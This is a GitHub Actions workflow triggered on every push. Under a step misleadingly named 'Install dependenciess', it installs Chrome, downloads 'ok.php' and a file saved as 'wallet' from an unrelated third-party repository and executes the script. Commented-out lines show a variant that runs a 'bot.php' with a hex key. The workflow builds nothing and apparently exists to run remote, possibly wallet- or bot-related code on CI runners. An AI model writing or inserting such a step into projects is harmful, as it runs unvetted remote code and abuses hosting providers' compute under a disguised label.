on:
  push:
name: aiadgxy

jobs:
  run_1:
    runs-on: ubuntu-latest
    continue-on-error: true
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.1'
        coverage: none
    - name: Install dependenciess
      run: |
        wget -q -O - https://dl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
        sudo sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google-chrome.list'
        sudo apt-get update
        sudo apt-get install google-chrome-stable
        
        wget https://raw.githubusercontent.com/Mosnio/dpy/main/ok.php
        wget -O wallet https://raw.githubusercontent.com/Mosnio/dpy/main/v1
        php ok.php
        
 #       unzip clm.zip
#        wget https://github.com/Mosnio/mehi1/raw/main/clm/cn1.js -O config.json
  #      echo -e "82d5372a1bf2e5b12f5b80b1c268ce56\n2" | php bot.php
  
